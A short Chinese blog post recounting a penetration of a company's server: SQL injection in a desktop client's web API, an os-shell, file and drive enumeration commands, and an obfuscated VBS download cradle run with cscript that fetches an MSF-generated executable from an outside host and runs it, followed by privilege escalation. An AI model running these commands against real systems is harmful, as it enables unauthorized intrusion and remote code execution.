记一次渗透实录

Mr.Wu 248 0

得到目标后,先对目标官网进行了一次常规的渗透检测,并没有发现什么突破口,然后又检测了下 APP 然而还是么有什么卵用。
在一筹莫展之时发现目标还有 PC 端的软件,果断下载抓包测试一番,成功得到 2 处 SQL 注入漏洞。

目标官网:www.xxx.com 软件的URL: sbl-webapi.sss.com 对 sbl-webapi.sss.com 服务器进行端口扫描发现存在 1433 和 3389
注入点是降权的 DBA 权限的 盲注,os-shell 交互shell 10分钟一条回显,速度巨慢,经过几天的折腾,曾成功进入过 2 个后台,但是 2 处后台虽然存在任意上传,但是启用的阿里云的 oss ,所以注定图片上传没戏,其他地方也没发现什么突破口。。。
然后想的是寻找绝对路径直接写 shell 反正有交互 shell 嘛。

dir /S /D c:\web.config

使用上方的命令尝试搜索 C\D\E\F 结果并没有搜到目标绝对路径,不过得到这么一个路径:c:\inetpub\wwwroot\LHWeb
使用下方命令确定盘符:

wmic logicaldisk where DriveType=3 get DeviceID

得到 C、F 2个盘,但是F盘是空的。
尝试往 c:\inetpub\wwwroot\LHWeb\upload 写 1.txt 测试,访问发现不存在,但是文件又确实写入了,因此判断非绝对路径,但是实在找不到别的路径了。
尝试读取配置文件 type c:\inetpub\wwwroot\LHWeb\web.config 然而里面并没有我想要的东西。。。
如果用命令继续翻目录读目录,按照这交互速度,那得折腾到啥时候去。。。其实已经折腾两天多了。。
最后想到个方法成功搞定:

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d.vbs

cscript d.vbs http://1.1.1.1/1.exe C:\\Windows\\temp\\1.exe


通过上方的命令,成功下载了MSF生成的shell.exe到目标服务器,然后执行获取到一个低权限交互shell

然后利用巴西烤肉成功提权

然后快乐的去登陆 3389 ,结果失败,然后把,不得不认清现实,站酷分离.....
尝试 getpass 看看是不是统一的密码,结果失败,没读出来,
好吧好吧,system 权限的交互shell,慢慢折腾吧,经过各种翻文件,最后终于找到了我要的东西:

至此成功搞定~

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ